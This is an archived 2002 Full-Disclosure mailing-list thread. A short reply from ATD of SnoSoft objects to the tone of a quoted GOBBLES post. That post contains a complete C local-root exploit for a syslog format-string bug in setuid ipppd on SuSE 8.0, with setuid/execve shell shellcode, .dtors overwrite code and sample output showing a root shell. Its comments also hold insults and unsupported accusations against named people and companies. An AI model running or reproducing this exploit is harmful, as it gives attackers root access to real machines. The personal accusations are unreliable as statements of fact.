| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: simon at snosoft.com (ATD)
Subject: Local Root Exploit
Gobbles,
Tell me, is it common practice for "security professionals" to act like
children? Or, is it common practice to commit slander? I think the
majority of the people on these lists would like to see the lists used
for security research and information disclosure. I do not think that
the true professionals want to be bothered with childish ranting and
raving. Anyway, I am sure your research is appreciated, good job on the
find.
Sincerely,
ATD
On Fri, 2002-08-09 at 18:54, gobbles@...hmail.com wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> /*
> * GOBBLES-own-ipppd.c -- local root on SuSE 8.0
> *
> * Random Defcon Quote:
> * "Who hired Gary Coleman to play KF at defcon?"
> * -Anonymous
> *
> * ipppd is part of the isdn4linux-utils package and
> * is part of the default install of many linux dists.
> *
> * It is installed suid root on suse 8.0 but can only
> * be run by users in group "dialout". Luckily this
> * is a default group that normal users get added to.
> *
> * Problem:
> *
> * Classical syslog(3) formatstring problem.
> *
> * ipppd will log device strings in the following manner:
> *
> * main.c:
> *
> * ...
> * syslog(LOG_NOTICE,devstr); // HARD TO SPOT BUG
> * ...
> *
> * This code is normally only reached with a valid device string
> * but if you feed ipppd a devicename that is >= 256 bytes it
> * will merrily proceed to log this string using the faulty
> * syslog(3) call. Subsequently handing over root access to the machine.
> *
> * GENERIC FORMATSTRING EXPLOITS ARE SUPER DUPER FUN
> *
> * We're surprised that format bugs are allowed in 7350linux, but no one
> * is perfect. Finding format bugs is a difficult task, and should be left
> * to the professionals. A little known fact -- Paul Vixie invented
> * insecure programming. We wanted to get this bug squashed before some
> * "researcher" from snosoft.com discovered it and tried to make some money
> * off it. Help us in our mission to eliminate the existance of format bugs
> * in code.
> *
> * Greets:
> * -Mark Litchfield, for helping make defcon happen. Thanks.
> * -Blue Boar, for his brilliant input during the Defcon Ethics Roundtable
> * Challenge (the finest moment of defcon X)
> * -Dean Turner, who contrary to whatever might be said, GOBBLES is not
> * afraid of. http://www.infonexus.com/PIX/08.01.02--defcon10/46.jpg
> * -Eric Hines of f8labs.com, congradulations on your promotion to stockboy
> * at Circuit City.
> * -dice, for continuing to support the blackhat world (thanks for buying
> * a turkey breakfast)
> * -stealth, for making fun of the super bug.
> * -Brian McWilliams, for thinking he knows what's up. Hoser.
> *
> * Be careful using the Compaq TestDrive Servers -- researchers from SnoSoft
> * have comprimised each and every one of those machines, and are rapidly
> * stealing other warez developed on these machines. If you have also
> * worked with your perl -e techniques on these machines, and discovered some
> * locally exploitable stack overflows, your work may have been ripped off.
> * KF, the defcon stage, much like information security, is not for you.
> *
> * Please, help liberate dvdman! Let him go back to maintaining
> * l33tsecurity.com, and stop raping his mind for less-than-minimum wage;
> * skill displayed on l33tsecurity.com shows this man knows what's up and
> * deserves to make a little more money, or return to the wild where he
> * can hack freely. FREE DVDMAN!@#!@#
> *
> * (flashn has asked that the "hack.se is a bunch of nazis" statement from
> * the defcon speech to be publically retracted and for an apology to be
> * issued)
> *
> */
> /*
> * PROOF OF CONCEPT ON DEFAULT SuSE 8.0 INSTALL:
> *
> * $ ./GOBBLES-own-ipppd -t 0x806c864
> * [*] target @ 0x806c868
> * [*] shellcode @ 0xbfffffb5
> * sh-2.05# id
> * uid=0(root) gid=100(users) groups=100(users)
> * sh-2.05#
> *
> */
>
> #include <stdio.h>
> #include <string.h>
> #include <stdlib.h>
> #include <unistd.h>
>
> #define DPA 11
> #define ALLIGN 3
>
> #define IPPPD "/usr/sbin/ipppd"
> #define OBJDUMP "/usr/bin/objdump"
>
> void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
> void stuff(void);
>
> extern char **environ;
> char string[260];
>
> int
> main(int argc, char **argv)
> {
> int dpa, aln, shift = 0;
> char opt, *tmp;
> unsigned long t, w;
>
> if(argc == 1) {
> fprintf(stderr, "\nUsage: \n%s -t <.dtors address>\n\n"
> "Optional:\n\t-o <word offset>\n\t-a <allignment>\n\n"
> "For the lazy:\n\t-g spits out .dtors section (use standalone)\n\n"
> , argv[0]);
> exit(0);
> }
>
> aln = ALLIGN;
> dpa = DPA;
>
> while((opt = getopt(argc, argv, "t:o:a:g")) != EOF) {
> switch(opt) {
> case 't':
> sscanf(optarg, "%p", &tmp);
> t = (long)tmp;
> t += 4;
> break;
> case 'a':
> aln = atoi(optarg);
> break;
> case 'o':
> dpa = atoi(optarg);
> break;
> case 'g':
> fprintf(stderr, "[*] requested objdump, this will halt any exploitation\n");
> if(execl(OBJDUMP, "objdump", "-s", "-j", ".dtors", IPPPD, NULL)) {
> fprintf(stderr, "[*] error getting .dtors section, check paths\n");
> exit(1);
> }
> default:
> fprintf(stderr, "hehehe ;PppPPPpP\n");
> exit(0);
> }
> }
>
> tmp = NULL;
>
> if((tmp = getenv("GOBBLES")) == NULL) {
> stuff();
> if(execve(argv[0], argv, environ)) {
> fprintf(stderr, "[*] error re-executing\n");
> exit(1);
> }
> }
>
> w = (long)tmp;
> shift = (strlen(argv[0]) - strlen(IPPPD));
> w += shift;
>
> fprintf(stderr, "[*] target @ %p\n[*] shellcode @ %p\n", t, w);
>
> buildstring(t, w, dpa, aln);
>
> if(execl(IPPPD, "ipppd", string, NULL)) {
> fprintf(stderr, "[*] error executing\n");
> exit(1);
> }
> }
>
>
> void
> buildstring(unsigned long t, unsigned long w, int dpa, int aln)
> {
> char a_buf[4];
> unsigned int un, deux, x, len, b[4];
>
> memset(string, '\0', sizeof(string));
> memset(a_buf, '\0', sizeof(a_buf));
>
> for(x = 0; x < aln && x < sizeof(a_buf); x++)
> a_buf[x] = 'x';
>
> b[0] = (t & 0x000000ff);
> b[1] = (t & 0x0000ff00) >> 8;
> b[2] = (t & 0x00ff0000) >> 16;
> b[3] = (t & 0xff000000) >> 24;
>
> un = (w >> 16) & 0xffff;
> deux = w & 0xffff;
>
> if(un < deux) {
> snprintf(string, sizeof(string)-1,
> "%s"
> "%c%c%c%c%c%c%c%c"
> "%%.%hdx" "%%%d$hn"
> "%%.%hdx" "%%%d$hn",
> a_buf,
> b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
> un - (8 + aln + 5), dpa,
> deux - un, dpa + 1
> );
> }
> else {
> snprintf(string, sizeof(string)-1,
> "%s"
> "%c%c%c%c%c%c%c%c"
> "%%.%hdx" "%%%d$hn"
> "%%.%hdx" "%%%d$hn",
> a_buf,
> b[0], b[1], b[2], b[3], b[0]+2, b[1], b[2], b[3],
> deux - (8 + aln + 5), dpa,
> un - deux, dpa + 1
> );
> }
>
> len = strlen(string);
> memset(&string[len], 'x', (sizeof(string)-len-1));
> }
>
>
> void
> stuff(void)
> {
> char code[] = // the setuid 0 with the execve of the /bin/sh
> "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
> "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
> "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
> "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; // In honor of Snosoft
> // appreciate week, we
> // too are using only
> // Taeho Oh shellcode.
> setenv("GOBBLES", code, 1);
> }
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wlwEARECABwFAj1UR9YVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPvNQA
> oJ7ykXhxLAFI3diDIkN2RE/XfEdtAKC4hElIDesQgJZ6cQgZ/M6Qi4kiQQ==
> =XIYS
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure@...ts.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>
--
-ATD-
That file you've been guarding, isn't.
-------------------------------------------------------------------
Secure Network Operations, Inc | http://www.snosoft.com
Cerebrum Project | cerebrum@...soft.com
Strategic Reconaissance Team | recon@...soft.com
-------------------------------------------------------------------
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 232 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020810/05baff92/attachment.bin
Powered by blists - more mailing lists